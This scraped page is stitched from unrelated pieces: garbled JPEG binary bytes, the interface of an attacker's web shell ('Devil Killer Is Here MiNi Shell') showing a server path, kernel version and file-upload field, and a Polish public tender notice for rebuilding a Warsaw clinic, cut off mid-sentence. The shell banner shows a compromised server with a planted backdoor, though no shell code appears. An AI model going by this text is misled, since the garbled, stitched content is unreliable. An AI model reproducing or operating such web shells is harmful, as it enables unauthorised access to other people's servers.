JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241227/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241227/0067344601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa budynku Centrum Diagnostyczno-Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa Praga-Północ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000311415</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jagiellońska 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-719</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">226196298</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@szpzlo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpzlo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa budynku Centrum Diagnostyczno-Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-594d64a9-bc43-44f7-8f48-3ffd271a0918</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00673446</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00024491/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa budynku Centrum Diagnostyczno - Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpzlo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu<br/>odbywać się będzie przy użyciu środków komunikacji elektronicznej, tj. platforma (Marketplanet): https://szpzlo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przystępując do<br/>niniejszego postępowania o udzielenie zamówienia akceptuje warunki korzystania z w/w platformy i obowiązujących Regulaminów<br/>dostępnych na stronie https://oneplace.marketplanet.pl/regulamin. Wymagania techniczne i organizacyjne sporządzenia, wysyłania i<br/>odbierania korespondencji elektronicznej opisane zostały w instrukcji dla wykonawcy dostępnej na platformie pod linkiem:<br/>https://szpzlo.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_action=publicFilesList&amp;folder=002c&amp;clientName=szpzlo&amp;MP_module=main. Wykonawca składający ofertę w formie elektronicznej, musi posiadać konto na Platformie e- Zamawiający (Marketplanet), wówczas<br/>ma dostęp do formularzy: złożenia, zmiany, wycofania oferty. Zamawiający rekomenduje podpisywanie plików w formacie pdf.<br/>formatem PAdES, a dokumenty w innym formacie niż pdf formatem XAdES. Oferta powinna być sporządzona w języku polskim, z<br/>zachowaniem postaci elektronicznej w formacie danych .doc, .docx, .xls, .xlsx, .pdf i podpisana podpisem podpisana kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Postać elektroniczna obejmuje przekazanie<br/>Zamawiającemu oferty składającej się z dokumentów/oświadczeń/formularzy w takiej formie w jakiej zostały utworzone i<br/>udostępnione przez Zamawiającego tj. dokumentu w postaci elektronicznej. Sposób sporządzenia oraz sposób przekazywania ofert,<br/>oświadczeń, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków<br/>dowodowych, oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu o udzielenie zamówienia,<br/>wymagania techniczne dla dokumentów elektronicznych, wymagania techniczne i organizacyjne użycia środków komunikacji<br/>elektronicznej służące do odbioru dokumentów elektronicznych jak również sposób ich sporządzenia określa Rozporządzenie<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>(Dz.U. z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679 Samodzielny Zespół Publicznych<br/>Zakładów Lecznictwa Otwartego Warszawa - Praga Północ (dalej: SZP ZLO Warszawa Praga - Północ), informuje, iż: 1)<br/>administratorem Pani/Pana danych osobowych (zwanym dalej administratorem”) jest SZPZLO Warszawa - Praga Północ,<br/>reprezentowany przez Dyrektora, z którym można się kontaktować na adres jego siedziby lub adres e-mail: sekretariat@szpzlo.pl, 2)<br/>administrator powołał Inspektora Ochrony Danych (IOD), który nadzoruje prawidłowość przetwarzania Pana/Pani danych<br/>osobowych. Z Inspektorem Ochrony Danych Osobowych można skontaktować pod adresem pocztowym SZP ZLO Warszawa -<br/>Praga Północ (z adnotacją skierowania sprawy do IOD) lub za pośrednictwem adresu e-mail: iod@szpzlo.pl, 3) Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem oraz udzielaniem<br/>informacji związanych z niniejszym postępowaniem, 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja niniejszego postępowania na podstawie ustawy Pzp oraz pracownicy Administratora<br/>zobowiązani do przeprowadzenia postępowania o udzielenie zamówienia publicznego, 5) Pani/Pana dane osobowe będą<br/>wykorzystywane w celach związanych z przeprowadzeniem niniejszego postępowania o udzielenie zamówienia udzielaniem<br/>informacji na jego temat oraz w celu ewentualnego zawarcia umowy, 6) Pani/Pana dane osobowe będą przechowywane, zgodnie z<br/>art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,7)obowiązek podania przez Panią/Pana danych<br/>osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,8) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO, 9) posiada<br/>Pani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,b) na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp<br/>oraz nie może naruszać integralności protokołu oraz jego załączników),c) na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego), d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 3. nie<br/>przysługuje Pani/Panu: 1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, 2) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO,3) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób<br/>fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający<br/>pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o<br/>których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zebrane w wyniku toczącego się postępowania dane osobowe mogą zostać<br/>wykorzystane do realizacji zadań związanych z przeprowadzeniem, zakończeniem, rejestracją i archiwizacją niniejszego<br/>postępowania. Zamawiający nie jest zobowiązany do indywidualnego informowania wszystkich osób, których dane zostaną<br/>pozyskane w trakcie prowadzenia procedury lub w związku z jej prowadzeniem po jej zakończeniu. Skorzystanie przez osobę, której<br/>dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych<br/>danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. W przypadku korzystania przez<br/>osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3<br/>rozporządzenia 2016/679, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. Skorzystanie przez osobę,<br/>której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16<br/>rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZPiZ.2620.86.ZP.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są roboty instalacyjne i budowlane polegające na przebudowie i modernizacji pomieszczeń parteru budynku ,,A’’ oraz części w budynku „B” i „C” wykonując aranżację odzyskanej przestrzeni 4 pomieszczeń biurowych i 3 gabinetów lekarskich dla potrzeb Centrum Diagnostyczno-Specjalistycznego oraz Przychodni Rodzinnej przy ul. Dąbrowszczaków 5a w Warszawie, wraz z zakupem wyposażenia i wyposażenia specjalistycznego oraz z dokumentacją powykonawczą wykonaną w Modelu 3 D.<br/>1)	szczegółowy przedmiot zamówienia zawarty jest w dokumentacji projektowo – kosztorysowej stanowiącej załączniki do SWZ;<br/>2)	ze względu na konieczność utrzymania funkcjonowania pracy poszczególnych poradni, zakres prac budowlano – montażowych musi zostać podzielony na etapy;<br/>3)	propozycja podziału i wykonanie poszczególnych etapów wraz z czasem niezbędnym do przeniesienia poradni z pomieszczeń przeznaczonych do remontu do pomieszczeń wyremontowanych musi zostać wskazana we wstępnym harmonogramie rzeczowo - finansowym zawartym w dokumencie „Proces technologiczny wykonania robót budowlanych – montażowych” stanowiącym część oferty;<br/>4)	przedmiot umowy musi być wykonany zgodnie z zasadami wiedzy technicznej i obowiązującymi w RP przepisami prawa powszechnie obowiązującego oraz normami technicznymi odnoszącymi się do przedmiotu umowy, w zakresie umożliwiającym użytkowanie przedmiotu umowy zgodnie z jego przeznaczeniem;<br/>5)	w razie wątpliwości poczytuje się, że Wykonawca podjął się wszystkich prac, niezbędnych do oddania przewidzianych w umowie robót budowlanych za wynagrodzeniem ustalonym na podstawie umowy, w tym również robót budowlanych wynikających z dokumentacji projektowej, a nieujętych w niej w zakresie robót budowlanych niezbędnych do wykonania;<br/>6)	Wykonawca zapewnieni zgodność dokumentacji powykonawczej 3D BIM z Wymaganiami Informacyjnymi Zamawiającego (AIR). Istotą dokumentacji powykonawczej 3D BIM jest jej realizacja zgodnie z Wymaganiami Informacyjnymi Zamawiającego (AIR). Oprócz realizacji inwestycji, efektem wykonania dokumentacji powykonawczej płaskiej 2D oraz 3D BIM jest możliwie najszersza implementacja standardu BIM, rozwijanie procesów BIM oraz edukacja i przygotowanie zarówno Zamawiającego, jak i Wykonawców do dalszego systemowego wdrażania BIM na inwestycjach realizowanych przez Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z Rozdziałem XVIII: OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT SWZ<br/>Kryterium Nr 1 –„Cena” (C)	<br/>ocena ceny przedmiotu zamówienia będzie dokonywana poprzez porównanie danych zawartych w ofertach do ceny najniższej wśród zaproponowanych. Punkty za kryterium będą obliczone wg wzoru:<br/><br/>najniższa cena brutto<br/>spośród wszystkich ofert podlegających ocenie<br/>C - ---------------------------------------------------------------------------- x 60% x100 pkt = Ilość punktów<br/>wartość brutto oferty badanej<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>obliczona liczba punktów dla oferty złożonej przez danego Wykonawcę wynikająca <br/>ze wzoru zostanie zaokrąglona do dwóch miejsc po przecinku.<br/><br/><br/>2)	Kryterium Nr 2 –„Proces technologiczny wykonania robót budowlano – montażowych” (PT)<br/>Proces technologiczny wykonania robót budowlano - montażowych (T) zostanie oceniona w oparciu o wzór:<br/><br/> liczba uzyskanych punktów przez ofertę badaną<br/>PT - ---------------------------------------------------------------- x 40% x 100 pkt = Ilość punktów<br/>najwyższa liczba uzyskanych punktów<br/> spośród ofert nie podlegających odrzuceniu<br/>obliczona liczba punktów dla oferty złożonej przez danego Wykonawcę wynikająca <br/>za wzoru zostanie zaokrąglona do dwóch miejsc po przecinku,<br/>Wykonawca zobowiązany jest do złożenia wraz z ofertą dokumentu pn. „Proces technologiczny wykonania robót budowlanych – montażowych”. <br/>Łączna maksymalna ilość punktów w kryterium (PT) = 40 (20 + 15 + 5).<br/>Obliczona liczba punktów dla oferty złożonej przez danego Wykonawcę wynikająca ze wzoru zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą sumę punktów wyliczoną w oparciu o wzór:<br/>Pi = Pi(C) + Pi(PT) <br/>gdzie:<br/>Pi – łączna ocena punktowa badanej oferty „i” <br/>Pi(C) - liczba punktów, jakie otrzyma badana oferta „i” za kryterium (C)<br/>Pi(PT) - liczba punktów, jakie otrzyma badana oferta „i” za kryterium (PT)<br/><br/>O wyborze najkorzystniejszej oferty zadecyduje najwyższa liczba punktów uzyskanych łącznie za kryteria 1- 2. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów <br/>w kryterium: „Cena” + „Proces Technologiczny”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Proces technologiczny wykonania robót budowlano – montażowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu, które mogą dotyczyć:<br/>1.	zdolności do występowania w obrocie gospodarczym – Zamawiający nie precyzuje w tym zakresie żadnych wymagań,<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie precyzuje w tym zakresie żadnych wymagań,<br/>3.	sytuacji ekonomicznej lub finansowej - Wykonawca spełni warunek jeśli wykaże, że:<br/>1)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 5 000 000,00 zł (słownie: pięć milionów złotych), dotyczy robót budowlanych, oraz posiada polisę ubezpieczenia budowy/montażu od wszystkich ryzyk – CAR/EAR. Wykonawca zobowiązany jest przedłożyć obie polisy.<br/>Ocena spełnienia powyższego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie dołączonych do oferty dokumentów.<br/>4.	zdolności technicznej lub zawodowej:<br/>1)	Wykonawca spełni warunek, jeśli wykaże, że dysponuje:<br/>a)	co najmniej jedną osobą przewidzianą do pełnienia funkcji kierownika budowy, posiadającej uprawnienia do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń, posiadającej co najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy, obejmujące wykonanie co najmniej 2 usług polegających na pełnieniu funkcji kierownika budowy w obiekcie podmiotu wykonującego działalność leczniczą, o wartości brutto kierowanych robót w każdej z tych usług co najmniej 2 000 000,00 zł brutto (słownie: dwa miliony złotych 00/100);<br/>b)	co najmniej jedną osobą 